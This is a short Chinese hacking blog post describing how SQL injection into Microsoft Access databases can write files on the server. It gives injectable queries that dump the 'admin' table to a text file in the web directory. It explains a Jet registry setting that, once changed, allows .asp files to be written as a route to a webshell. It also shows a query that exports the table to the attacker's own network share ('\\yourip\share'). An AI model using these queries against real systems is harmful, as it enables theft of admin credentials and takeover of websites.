熱 點(diǎn)：

已經(jīng)聽N個(gè)人過說有人已經(jīng)發(fā)現(xiàn)SQL注入Access得到webshell的技術(shù)了，也只是聽說而已，具體的細(xì)節(jié)還是不得而知。
最近在看的書中一章提到Jet的安全，然后靈光一閃，呵呵，發(fā)現(xiàn)了一種可以利用access導(dǎo)出asp的方法，分享之。
幾個(gè)月之前網(wǎng)上就流傳利用SQL注入Access導(dǎo)出數(shù)據(jù)庫內(nèi)容到文本文件（可導(dǎo)出txt、htm、html等格式）的方法：
SELECT * into [test.txt] in ’d:\web\’ ’text;’ from admin
執(zhí)行上述語句，在d:\web目錄下就會(huì)生成test.txt文件，其內(nèi)容就是表admin的內(nèi)容。但是導(dǎo)出asp格式就不行，會(huì)說“不能更新，數(shù)據(jù)庫或?qū)ο鬄橹蛔x”。
其實(shí)控制導(dǎo)出文件后綴是存儲(chǔ)在注冊(cè)表的，具體鍵值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension，默認(rèn)情況下值為“!txt,csv,tab,asc,tmp,htm,html”，如果我們把a(bǔ)sp也添加進(jìn)去的話，呵呵，就可以導(dǎo)出asp格式的文件了。
這個(gè)方法跟那個(gè)調(diào)用Access的Shell函數(shù)執(zhí)行命令一樣，要修改注冊(cè)表，所以利用不是很大。
順便提一下，前面提到的導(dǎo)出文本文件的方法如果不知道web路徑貌似可以導(dǎo)出到自己機(jī)器的哦：SELECT * into [test.txt] in ’\\yourip\share’ ’text;’ from admin

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。